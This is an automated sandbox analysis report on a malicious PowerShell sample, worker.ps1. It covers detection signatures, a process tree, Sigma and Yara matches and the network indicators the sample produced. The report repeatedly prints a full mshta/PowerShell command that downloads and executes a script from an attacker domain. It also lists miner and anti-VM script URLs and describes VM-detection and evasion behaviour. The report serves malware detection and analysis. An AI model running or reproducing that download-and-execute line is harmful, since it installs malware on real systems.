Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
worker.ps1

Overview

General Information

Sample name:worker.ps1
Analysis ID:1592722
MD5:dfa164f1695a9bd6c212e61c9526b668
SHA1:86cdd56775d65fd2ae79a64f13e8a49fa45c2faa
SHA256:5cc0d46909bd6733dd331e2dfcef5ef9b9a9efb709b104c1c9a9d49026715065
Tags:ps1user-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected PowerShell ScreenShot
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Wscript Shell Run In CommandLine
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 6740 cmdline: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close) MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 6176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
worker.ps1JoeSecurity_PowerShellScreenShotYara detected PowerShell ScreenShotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PowerShellScreenShotYara detected PowerShell ScreenShotJoe Security
      Process Memory Space: powershell.exe PID: 7144JoeSecurity_PowerShellScreenShotYara detected PowerShell ScreenShotJoe Security
        Process Memory Space: powershell.exe PID: 7144INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x237c1c:$b2: ::FromBase64String(
        • 0x8ab0d:$s1: -join
        • 0x97be2:$s1: -join
        • 0x9afb4:$s1: -join
        • 0x9b666:$s1: -join
        • 0x9d157:$s1: -join
        • 0x9f35d:$s1: -join
        • 0x9fb84:$s1: -join
        • 0xa03f4:$s1: -join
        • 0xa0b2f:$s1: -join
        • 0xa0b61:$s1: -join
        • 0xa0ba9:$s1: -join
        • 0xa0bc8:$s1: -join
        • 0xa1418:$s1: -join
        • 0xa1594:$s1: -join
        • 0xa160c:$s1: -join
        • 0xa169f:$s1: -join
        • 0xa1905:$s1: -join
        • 0xa3a9b:$s1: -join
        • 0xb24e5:$s1: -join
        • 0xc7c2d:$s1: -join

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: MSHTA Suspicious Execution 01
        Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), CommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), ProcessId: 6740, ProcessName: mshta.exe
        Sigma detected: Script Interpreter Execution From Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7144, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" , ProcessId: 2056, ProcessName: powershell.exe
        Sigma detected: Suspicious Invoke-WebRequest Execution
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6740, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex, ProcessId: 6176, ProcessName: powershell.exe
        Sigma detected: Suspicious MSHTA Child Process
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6740, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex, ProcessId: 6176, ProcessName: powershell.exe
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7144, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" , ProcessId: 2056, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1", ProcessId: 7144, ProcessName: powershell.exe
        Sigma detected: PowerShell Web Download
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), CommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), ProcessId: 6740, ProcessName: mshta.exe
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), CommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), ProcessId: 6740, ProcessName: mshta.exe
        Sigma detected: Wscript Shell Run In CommandLine
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), CommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close), ProcessId: 6740, ProcessName: mshta.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1", ProcessId: 7144, ProcessName: powershell.exe
        Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7144, TargetFilename: C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: worker.ps1Virustotal: Detection: 16%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
        Source: unknownHTTPS traffic detected: 49.12.234.183:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: Binary string: scorlib.pdbpdblib.pdbi~$m5 source: powershell.exe, 00000000.00000002.4194333216.00000279DB238000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: ident.me
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6Host: ident.meConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6Host: ident.meConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ident.me
        Source: global trafficDNS traffic detected: DNS query: encrypthub.org
        Source: powershell.exe, 00000000.00000002.4194333216.00000279DB1B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microcG.l.
        Source: powershell.exe, 00000000.00000002.4194037288.00000279DAF50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C4860000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C4837000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C482B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C48C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://encrypthub.org
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1String found in binary or memory: http://encrypthub.org:8080
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C4086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ident.me
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1String found in binary or memory: http://ifconfig.me
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1String found in binary or memory: http://ip-api.com/json
        Source: powershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1738126221.000001F2BFB06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.1738126221.000001F2BFABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1738126221.000001F2BFADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C4860000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C4602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C4837000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C48C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://encrypthub.org
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1String found in binary or memory: https://encrypthub.org/main/antivm.ps1
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1String found in binary or memory: https://encrypthub.org/main/marko/miner.ps1
        Source: worker.ps1String found in binary or memory: https://encrypthub.org/main/zakrep/worker.ps1
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C48C8000.00000004.00000800.00020000.00000000.sdmp, worker.ps1String found in binary or memory: https://encrypthub.org/panel/
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1String found in binary or memory: https://ident.me
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C3F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ident.me/
        Source: powershell.exe, 00000000.00000002.4159251650.00000279C3F5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ident.me/p
        Source: powershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownHTTPS traffic detected: 49.12.234.183:443 -> 192.168.2.4:49730 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Yara detected PowerShell ScreenShot
        Source: Yara matchFile source: worker.ps1, type: SAMPLE
        Source: Yara matchFile source: 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYSTR

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B8600B90_2_00007FFD9B8600B9
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.evad.winPS1@9/13@2/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1h5byu0.ukl.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: worker.ps1Virustotal: Detection: 16%
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\worker.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close)
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" Jump to behavior
